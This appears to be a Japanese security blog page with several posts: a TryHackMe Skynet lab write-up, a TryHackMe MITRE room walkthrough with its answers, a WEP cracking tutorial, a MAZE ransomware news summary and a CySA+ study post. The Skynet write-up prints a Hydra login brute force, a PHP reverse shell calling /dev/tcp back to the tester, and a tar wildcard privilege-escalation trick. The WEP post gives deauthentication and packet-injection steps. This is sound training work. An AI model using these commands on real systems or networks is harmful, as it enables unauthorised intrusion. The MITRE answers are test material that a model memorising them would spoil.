Tryhackme Writeup Skynet
Skynet
今回のターゲット
TryhackMeのSkynet というMachineを攻略していきます。
※どこかで見たような会社とキャラクターですね。。。w
まずはNmap!
nmap -T4 -A -Pn -v TargetIP
使用中のサービスで気になるのは”Samba”ですかね。
Enum4linuxでsamba環境を列挙
enum4linux -U -S TargetIP
-U get userlist
-S get sharelist
enum4linuxはWindowsとSambaシステムから情報を列挙するためのツールです。
列挙結果を見てみると、"Anonymous"というshareがあるようなのでsmbclientを使ってアクセスしてみます。
smbclient //10.10.154.152/anonymous
attention.txt中身:
log1.txt
なんかのパスワード??
gobusterで列挙
タスクによるとMaliパスワードを求められていますので、めぼしいパスがないか列挙します。
※Gobuster is a tool used to brute-force:
URIs (directories and files) in web sites.
DNS subdomains (with wildcard support).
gobuster dir -u http://targetIp -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
dir:ディレクトリ検索
-u:対象のURLを指定
-w:ワードリストを指定
-t:同時スレッド数を指定(デフォルト:10)
/sequirrelmailが怪しい!ってことでアクセスしてみると。。
login formに繋がりました!
hydraでbrute force
hydra -l milesdyson -P log1.txt targetIP http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
パスワードが見つかりました。
これを使ってログインしてみましょう。
milesさんのメールの中身をあさってみます。
するとSambaのパスワード通知らしきタイトルが。
びんご!
milesさんのsambaパスワードを入手できましたのでこれで再度smbclientを使って、
milesdysonのshareに入ります。
smbclient //targetIP/milesdyson --user=milesdyson
なんかいっぱいありますが。。。
important.txt が怪しい??
Add features to beta CMS /45kra24zxs28v3yd
とありますので、このディレクトリにアクセスしてみます。
!!!
なんかでたw
もう一度gobuster!
上の情報だけだと何も分からないので、gobusterを再度かけてみます。
CMSってメモにもあったのでログインページがあるかもしれません。
CuppaというCMSを利用しているようです。
Searchsploitで検索
上記を試してみます。
※上記表示は一部のみ
exploitdbに記載あるとおりコマンドが実効されたのを確認できたので、これを使ってリバースシェルを張ります。
リバースシェル用のphpファイルを作成します。
<?php
exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/LocalIP/1234 0>&1'");
?>
pythonでwebサーバを立て、シェル用のファイルを流し込みます。
python -m SimpleHTTPServer
上記と同時に、
nc -lvnp 1234
リバースシェルを待ち受けます。
URL入力窓に先ほどのコードを入力すると、シェルを獲得することができます。
特権昇格
ここまででUser.txtは獲得できますので、最後のRoot.txt獲得のため、特権昇格を目指します。(筆者はここで挫折してしまい、カンニングをしてしまいました。。さんぽしさんありがとうございます!(https://sanposhiho.com/posts/2020-05-06-qiita-35317a3c8b0677ee3713/))
今回の特権昇格には、cronjobを使います。
crontabを確認すると。。。
backupを行ってそうな.shファイルを確認できますね。
ワイルドカード * を使っています。
この場合下記リンクの情報によると、
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/
–checkpoint=1や --checkpoint-action=exec=sh shell.sh などの名前のファイルを作成しておくと、特定のコマンドでのワイルドカードの使用時にオプションとして理解されてしまうとのことです。
shell.shを作成し、chmod 777 /root と書き込みましょう。
続いて、–checkpoint-action=exec=sh shell.shを作成しておきます。
あとはcronjobが実行されるのを待ちます。
cd /root
が実行できればroot.txtの中身を見ることができます。
まとめ
初WriteUpdeでしたがかなり勉強になりました。
何気なく使っているコマンドの意味、オプションの使い方を復讐できていいですね。
OSCPコースのマシンはwriteup書いてみようと思います。
THM MITRE WirteUp 兼 取扱メモ
THM MITRE WirteUp 兼 取扱メモ
この記事の概要
当記事はMITREの概要、使い方、調べ方をTryHackMeの MITRE課題のWriteUpという形で解説してます。
MITREってなに?
名前知ってるけど使い方わかんない!
って方におすすめかもしれない記事になってますので、
よければ最後までどうぞ。
MITREとは
読み方:まいたー
組織の概要:
(引用:https://www.mitre.org/about/corporate-overview)
“At MITRE, we solve problems for a safer world. Through our federally funded R&D centers and public-private partnerships, we work across government to tackle challenges to the safety, stability, and well-being of our nation.”
要約すると、より安全な世界のために、国の安全、安定、幸福への課題について取り組んでいる組織
なお本記事では。
- ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge)Framework
- CAR(Cyber Analytics Repository)
- SHIELD Active Defense
- AEP(ATT&CK Emulation Plans)
上記に焦点を当てて解説してきます。
用語の整理
・APT=組織や国に対して長期的な攻撃を実施するチームおよびグループのこと。
・TTP=Tactics,Techniques,Proceduresの頭文字
Tactics=攻撃者の目的や目標物
Techniques=攻撃者が目的を達成するための方法
Procedures=攻撃がどのように実行されるかといった手順
いきなりタスク3 ATT&CK
ATT&CKフレームワークとは:
リアルワールドの状況に基づいた攻撃者の戦術と技術に関するナレッジベースのこと
(上記概要ページから意訳 https://attack.mitre.org/)
下記画像は概要ページ下部のスクリーンショット。
攻撃フェーズごとに攻撃者のテクニックがカテゴライズされている。
テクニックをクリックすると関連のあるサブテクニックが表示される。
ちなみに。。。
特定のぐるーぷを選択→ATT&CK Navigator layersボタンをクリックすると、そのグループが利用するツールや攻撃テクニックを攻撃フェーズごとに表示することができる。
特定の攻撃者グループについてリサーチしたりするときに便利かも。。?
さて、タスクに戻りましょう。
タスク3では(https://attack.mitre.org/techniques/T1566/)
上記サイトから答えを探します。
#1Only blue teamers will use the ATT&CK Matrix? (Yay/Nay)
答え:Nay
#2What is the ID for this technique?
答え:T1566
#3Based on this technique, what mitigation covers identifying social engineering techniques?
答え:User Training
#4There are other possible areas for detection for this technique, which occurs after what other technique?
答え:User Execution
#5What group has used spear phishing in their campaigns?
答え:Dragonfly
#6Based on the information for this group, what are their associated groups?
答え:TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear
#7What tool is attributed to this group to transfer tools or files from one host to another within a compromised environment?
答え:PsExec
#8Based on the information about this tool, what group used a customized version of it?
答え:FIN5
#9This group has been active since what year?
答え:2008
#10Instead of Mimikatz, what OS Credential Dumping tool is does this group use?
答え:Windows Credential Editor
タスク4 CAR Knowledage Base
CAR概要:
「MITREサイバーアナリティクスリポジトリ(CAR)は、MITRE ATT&CK®のアドバサリーモデルに基づいてMITREが開発したアナリティクスのナレッジベースです。CARは、疑似コード表現で活用されるデータモデルを定義していますが、分析には特定のツール(Splunk、EQLなど)を直接ターゲットにした実装も含まれています。カバレッジに関して、CARは、特にその動作理論と理論的根拠に関して、検証され、よく説明されたアナリティクスのセットを提供することに重点を置いています。(公式より引用(機械翻訳)https://car.mitre.org/)
今回は下記を確認しながら質問に答えていきます。
https://car.mitre.org/analytics/CAR-2020-09-001/
アクセスすると、画像のように、簡単な概要と、
テクニック、サブテクニック、戦術というカテゴリー別にリストが表示されており、ATT&CKへのリンクになっています。
では上記リンクを確認しながらタスクをこなしていきましょう。
#1For the above analytic, what is the pseudocode a representation of?
答え:Splunk search
#2What tactic has an ID of TA0003?
答え:Persistence
#3What is the name of the library that is a collection of Zeek (BRO) scripts?
答え:BZAR
ヒント:メインページを確認しましょう
#4What is the name of the technique for running executables with the same hash and different names?
答え:Masquerading
ヒント:analyticページを確認しましょう
#5Examine CAR-2013-05-004, what additional information is provided to analysts to ensure coverage for this technique?
答え:Unit Tests
タスク5 Shield Active Defense
MITRE|SHIELDとは:
“シールドは、MITRE が開発しているアクティブディフェンスの知識ベースであり、アクティブディフェンスと敵対者との交戦について学んでいることを 把握し、整理するためのものです。10年以上の敵対者との関わり合いの経験から生まれたもので、機会と目的に関する高度なレベルの検討から、防衛側が利用可能なTTPに関する実務者向けの議論まで、幅広い範囲をカバーしています。”(引用(機械翻訳):https://shield.mitre.org/)
アクティブディフェンスとは、能動的に攻撃者の活動を検出したり、攻撃者を騙したりすることで攻撃者の情報を収集、目的の妨害を実施するなど、能動的に検知、防御をする手法のことです。
以下タスクになります。
#1Which Shield tactic has the most techniques?
答え:Detect
ヒント:下記画像からタクティクスを確認しましょう。
#2Is the technique ‘Decoy Credentials’ listed under the tactic from question #1? (Yay/Nay)
答え:Yay
https://shield.mitre.org/techniques/DTE0012/
#3Explore DTE0011, what is the ID for the use case where a defender can plant artifacts on a system to make it look like a virtual machine to the adversary?
答え:DUC0234
#4Based on the above use case, what is its ATT&CK® Technique mapping?
答え:T1497
#5Continuing from the previous question, look at the information for this ATT&CK® Technique, what 2 programs are listed that adversary’s will check for?
答え:Sysinternals and Wireshark
ヒント:https://attack.mitre.org/techniques/T1497/
タスク6 ATT&CK Emulation Plans
ここまでの情報でも不十分な場合は、CTID、Adversary Emulation Library、ATT&CK® Emulation Plansを使うことができます。
CTIDとは:
MITREは、The Center of Threat-Informed Defense (CTID)という組織を設立しました。この組織は、世界中の様々な企業やベンダーで構成されており、目的はサイバー脅威とそのTTPに関する研究を行い、その研究を共有することで、すべての人のためのサイバー防御を向上させることにあります。
Adversary Emulation Library & ATT&CK® Emulations Plansとは:
Adversary Emulation Libraryは、Bkue・Redチームのための無料資料として、ATT&CK® Emulations Plansを作成している公開ライブラリです。現在、3つのATT&CK®エミュレーションプランがあります。APT3、APT29、FIN6です。
ATT&CK® Emulations Plansは、特定の脅威グループを模倣する方法についてのステップバイステップのガイドです。
もし、C-Suite の中に「APT29 が攻撃を受けたらどうするか」という質問があったとします。これは、エミュレーション計画の実行結果を参考にすることで簡単に答えられます。
以下はタスクとなります。
#1How many phases does APT3 Emulation Plan consists of?
答え:3
#2Under Persistence, what binary was replaced with cmd.exe?
答え:sethc.exe
#3Examining APT29, what 2 tools were used to execute the first scenario?
答え:Pupy and Meterpreter
#4What tool was used to execute the second scenario?
答え:PoshC2
#5Where can you find step-by-step instructions to execute both scenarios?
答え:ATT&CK Arsenal
タスク7 ATT&CK and Threat Intelligence
脅威インテリジェンス(Threat Intelligence:TI)またはサイバー脅威インテリジェンス(Cyber Threat Intelligence:CTI)とは:
敵対者に帰属する情報(TTP)のことです。脅威インテリジェンスを使用することで、防御者として、防御戦略に関するより良い意思決定を行うことができます。この脅威インテリジェンスの中には、オープンソースのものもあれば、CrowdStrikeのようなベンダーとの契約によるものもあります。一方、多くの情報システム部は組織内で複数の役割を担っており、脅威インテリジェンスに集中するために他の業務から時間を割く必要があります。後者に対応するために、脅威インテリジェンスにATT&CK®を使用するシナリオに取り組みます。
以下タスク。
シナリオ:あなたは航空業界で働くセキュリティ・アナリストです。あなたの組織はインフラストラクチャをクラウドに移行しようとしています。あなたの目標は、ATT&CK®マトリックスを使用して、この特定のセクターを標的とする可能性のあるAPTグループの脅威インテリジェンスを収集し、あなたの懸念分野に影響を与えるテクニックを使用することです。カバー範囲にギャップがないかどうかを確認します。グループを選択した後、選択したグループの情報とその戦術、技術などに目を通してください。
#1What is a group that targets your sector who has been in operation since at least 2013?
APT33
Does this group use Stuxnet? (Yay/Nay)
答え:Nay
#2As your organization is migrating to the cloud, is there anything attributed to this APT group that you should focus on? If so, what is it?
答え:Cloud Accounts
#3What tool is associated with this technique?
答え:Ruler
#4Per the detection tip, what should you be detecting?
答え:Abnormal or malicious behavior
#5What platforms does this affect?
答え:AWS, Azure, Azure AD, GCP, Office 365, SaaS
参考
TryHackMe MITRE課題
https://tryhackme.com/room/mitre
MITREについて
https://attack.mitre.org/
SHIELDについて
https://blog.macnica.net/blog/2020/09/mitre-shield.html
MITRE-ENGENUITYについて
https://mitre-engenuity.org/
CARについて
https://car.mitre.org/
kaliで wifi hack! その1 wep編
最近WiFi-Hackについてオベンキョしたのでメモ。
実施環境
USB wifi アダプター PAOU5
手順1
iwconfigでインターフェースを確認
manage mode なら、
ifconfig インターフェース名(wlan0とか) down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
でモニターモードに変更
手順2
airodump-ng インターフェース名(wlan0とか)
ここではアクセスポイント の情報を収集。
ターゲットの情報、bssid channel 等をメモしておく。
手順3
パケットキャプチャ
airodump-ng --bssid (対象のbssid) --channel (対象のチャンネル) -wirte (ファイル名) (インターフェース名)
例
airodump-ng --bssid 00:11:22:33:44:55 --channel 1 -write test wlan0
上記でターゲットのAPの通信情報を収集する
ここまででWepキークラックに必要な情報は収集終了。
が、クラックのためには大量のパケットが必要になるので、下記手順にパケットを収集する。
パケットキャプチャは継続しつつ、別ターミナルで下記手順を実行する。
手順4
アソシエーションの確立
aireplay-ng --fakeauth 0 -a bssid -h インターフェースMACアドレス インターフェース名
例
aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff wlan0
認証を確立する。
これを行うことで、APがこちらの通信に対してリアクションをくれるようになる。
手順5
パケット収集する。
方法は問わないが下記に効率よくパケットを収集できる方法を記載する。
-強制切断
aireplay-ng --deauth 任意の回数 -a (bssid) -c (クライアント側のMACアドレス) (インターフェース名)
例
aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c 66:77:88:99:11:22 wlan0
aireplay-ng -arpreplay -b (bssid) インターフェース名
例
aireplay-ng -arpreplay -b 00:11:22:33:44:55 wlan0
手順6
wepキーの解析
上記で集めたデータを元にクラックをかけます。
(大体50000〜1000000あれば十分かと。私は80000でいけました)
aircrack-ng 対象ファイル
例:
aircrack-ng test-01.cap
以上の操作で、必要な分のパケットが揃っていればWEPのパスワードを特定することができる。
以下メモ
#WEPの暗号化鍵は”IV”と”WEPキー”で構成される
IV=パケットごとに異なる24ビットのデータ
WEPキー=APに接続するためのパスワード
上記の暗号化方式は共通鍵の一種なので、送信者、受信者共にIVを知らないと複合ができない。そのため、IVは”平文”でパケットに格納されている。そのためこれを大量に収集することでWEPキーの特定が可能となってしまう。
良い子はWEP使うのやめようね!!!
※当記事に記載ある内容を試す際には自分の環境で実験してください。
ランサムウェアMAZEについてのニュースまとめ
その中でもMAZEというランサムウェアグループの活動が目に着いたので関連ニュースをまとめてみたでやんす。
MAZEとは
悪意ある攻撃者は、少なくとも2019年5月以降、MAZEランサムウェアを積極的に展開してきました。ランサムウェアは、当初スパム・メールとエクスプロイト・キットを使って配付されていましたが、その後、侵害後の配付に移行しました。地下フォーラムでの疑わしいユーザーの観察と、Mandiantインシデントレスポンスの取り組みで見られる個別のTTP(Tactics, Techniques, Procedures)によると、複数の攻撃者がMAZEランサムウェア活動に関与しています。また、MAZEの背後にいる攻撃者は、恐喝の支払いを拒否した被害者から窃取したデータを投稿する公開ウェブサイトを維持しています。
特徴
機密データのダンプと企業ネットワークの破壊という、これら2つの侵入の成果を犯罪サービスと組み合わせることで、MAZEは多くの組織にとって注目すべき脅威となります。このブログの記事は、多数のMandiantインシデントレスポンスの取り組みから得られた情報と、MAZEエコシステムと活動に関する独自の調査に基づいています。
簡単に言ってしまうと、
”情報漏洩✖️ランサムウェア”
身代金を払わない被害者に対して、情報をリークすると恐喝し、身代金を要求するというものになっておりまして、非常にタチが悪いというか何というか。。
ニュース
MAZE ランサムウェアグループの活性化
攻撃手法
Mirte attckでの情報とリンク
https://attack.mitre.org/software/S0449/
下記リンクの下部では攻撃手法の詳細について記述があります
関連ニュース
2020/06/26:
2020/07/20:
2020/08/04:
2020/08/14:
CySAに合格したった話
駆け出せてもない0歩目セキュリティエンジニアがCySA合格しちゃったので、なんとなく勉強方法と対策したことをまとめておくでやんす。
そもそもCySAって何やねんって話
CySA+とは。。。以下引用。
CompTIA Cybersecurity Analyst(CySA+)は、国際的に認知されているベンダーニュートラルの認定資格です。
CompTIA CySA+を取得することで、ITセキュリティにおける分析と、セキュリティ全体の改善を実行するために必要となるスキルを習得することができます。企業/組織の重要なインフラやデータのセキュリティを維持するために必要となる脅威検出/脅威分析ツールの使用、分析、監視を行うスキルを証明します
引用元:https://www.comptia.jp/certif/cybersecurity/comptia_cysa/
上記の通り、セキュリティアナリストとしての知識を求められる試験のことっすね。
受けた理由と所感
異動&転職目的っす(素直)
正直認知度の低い資格なのでそこまで活用できるかは不明瞭なものの、脆弱性診断ツールについての知識や、ファイアウォールログの見方についてなど、アナリストが行う業務についての知識を幅広く学ぶことが出来たんでよかったかなと思っとります。
対策と勉強時間について
勉強時間は1ヶ月ないくらい。
(CySA+ Web模擬試験)に取り組みました。
対策手順としては以下の通り。
- 一度問題集を解いてみる
- わからないところを調べる
- もう一度問題集を解く
- テキストをマインドマップにまとめる
- Web模擬試験を解く
- わからないところを調べる&マインドマップに追記していく
- Web模擬試験を解く
- 以下手順5〜7のループ
あとは実機を触ってみたり、CVEのサイトを実際に観に行ってみたのもよかったかなと思っております。(私の場合、ハッキングラボ の教科書で仮想環境立てて遊んでたのが功を奏したのかもしれません)
これからの予定とか
さくっとCySAが取れたんで次は応用とCCNAにチャレンジしたいなーと思っとります。
こっちは簡単ではないかもですが、基礎固めにはいいかなと。
よーし今日も一日頑張るぞい!